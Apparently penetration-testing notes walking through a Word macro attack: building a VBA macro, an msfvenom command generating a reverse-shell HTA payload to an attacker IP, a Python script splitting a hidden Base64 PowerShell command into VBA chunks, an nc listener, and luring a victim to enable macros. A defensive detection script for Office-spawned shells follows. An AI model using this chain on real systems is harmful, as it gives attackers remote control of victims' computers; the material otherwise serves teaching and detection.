# MSOffice macro attack

**Using macros for attacks: open Word → View → Macros**

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FKyhahydY0Z4V2WIHVQh1%2F1.png?alt=media\&token=ce3202d9-1373-4d5b-8534-bcc77623850e)

**Create a new macro**

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2Fd1k8FjQEDUOkHxlZMd9C%2F2.png?alt=media\&token=9bf633c5-1392-4344-bffa-b0b304c6723f)

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FG1sRoIQ6k89QmAPnfsoZ%2F3.png?alt=media\&token=5b8bb084-722a-4e60-ab2d-4125049407d5)

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2F23h2OE0ceyej7qEzuDnt%2F4.png?alt=media\&token=78c14aae-0ba6-48e4-af34-46efdf671e26)

**We must save the containing document as either .docm or the older .doc format, which supports embedded macros, but must avoid the .docx format, which does not support them.**

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FVdVdFpsW1ReerskHuu7n%2F5.png?alt=media\&token=24161601-cdae-40c8-b12d-2eb0f9d846fb)

**Save on Desktop**

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FC2m4iyFnI7oEJZ76SsR7%2F6.png?alt=media\&token=35fc366f-12bc-47e8-8257-6513a521b46c)

**Click on EvilMacro and enable content to trigger the script**

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FOX7RsPYFvnsQ1rwZdM8b%2F7.png?alt=media\&token=2b9831c5-5b1e-44f7-978d-d18cda102787)

**Macro triggers cmd.exe**

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FDgLAj7cuHOuKqnxeWN2p%2F8.png?alt=media\&token=3d22fb23-4c4e-4549-9a24-366512828837)

**Using PowerShell and a Base64-encoded payload to get a reverse shell**

```
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.177 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
```

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2F3d7knQLh4mYsC0n0tC6k%2F9.png?alt=media\&token=1e4b26ef-8cb9-4391-8f0e-42484f22e953)

Edit the EvilMacro

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FfKqpJoOTr2mzV78zw89r%2F10.png?alt=media\&token=1b162961-d0b4-4492-be79-0b530af0ae07)

**Since VBA has a limit on the length of string literals, we have to split the command into chunks before running the exploit.**

```
# Python3 script: emit the long PowerShell command as VBA string concatenations,
# because a single VBA string literal cannot hold the whole encoded command.

cmd = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."

n = 50  # characters per chunk

for i in range(0, len(cmd), n):
    # Each line rebuilds the command piece by piece inside the macro (Str = Str + "...")
    print("Str = Str + " + '"' + cmd[i:i+n] + '"')
```

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2F4vxIzfrZTWxg98inJ3Kh%2F11.png?alt=media\&token=cb87107b-b98a-4da5-bc40-cf4ec766c322)

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FLeL7H8yASrw3eyyC77ej%2F12.png?alt=media\&token=e1c74c4a-51f8-42ae-b18f-1787c64ba56d)

**Insert the macro**

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2F0wkjiCKtFlVcz9PlQZNC%2F13.png?alt=media\&token=b78a6173-2a4f-45a6-b337-1c188b898650)

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2Fr6HGgjEWqKd0IHAD1wT6%2F14.png?alt=media\&token=e06fa5e9-6117-4d65-9e6c-4bed6e378825)

**Start a nc listener on port 4444**

`nc -nvlp 4444`

You have to save the document in the Word 1997-2003 format, as later versions are not vulnerable.

Open the file and enable macros

In an engagement scenario the victim has to be enticed to open the document and enable macros (unlikely).

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2F9EbTyXlFj299VMEjhOWe%2F15.png?alt=media\&token=149fb060-7fbe-4094-b47b-0330e87effa0)

**Catch the revshell**

![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FssdMfv0kixkXU9Y4gOk2%2F16.png?alt=media\&token=08daa4a8-0603-4a73-aae2-13bde16a486b)
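From the defender's side, the chain above (Word spawning cmd.exe, or a hidden powershell.exe with a Base64 `-e` payload) is exactly what process-creation telemetry shows. The following Python is an added example, not part of these notes: it decodes the `-e` argument and scores parent/child and flag combinations over constructed sample events. The event field names and the encoded sample string are assumptions, not a real product schema or the msfvenom output.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe"}
# PowerShell accepts unambiguous prefixes of -EncodedCommand; -e is the one used above.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the -e payload decoded as UTF-16LE text, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def assess_event(event):
    """Score one process-creation event: (score, reasons, decoded payload or None)."""
    reasons = []
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    if parent in OFFICE_PARENTS and image in SHELLS:
        reasons.append(f"{event['parent']} spawned {event['image']}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("Base64-encoded PowerShell command")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.IGNORECASE):
        reasons.append("hidden window")
    if re.search(r"-nop\b|-noprofile\b", cmd, re.IGNORECASE):
        reasons.append("profile disabled")
    return len(reasons), reasons, decoded

# Constructed sample events (field names are assumptions, not a specific product's schema);
# the encoded payload is a harmless constructed string, not the page's msfvenom output.
SAMPLE_PLAINTEXT = "Write-Output 'constructed sample'"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -e " + SAMPLE_ENCODED},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": "WINWORD.EXE", "image": "cmd.exe", "cmdline": "cmd.exe /c echo constructed"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        score, reasons, decoded = assess_event(ev)
        print(f"score={score} {ev['cmdline'][:40]}... reasons={reasons} decoded={decoded!r}")
```

The same scoring works over Sysmon event 1 or Security 4688 records once the parent image, image and command line fields are mapped onto the three keys used here.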
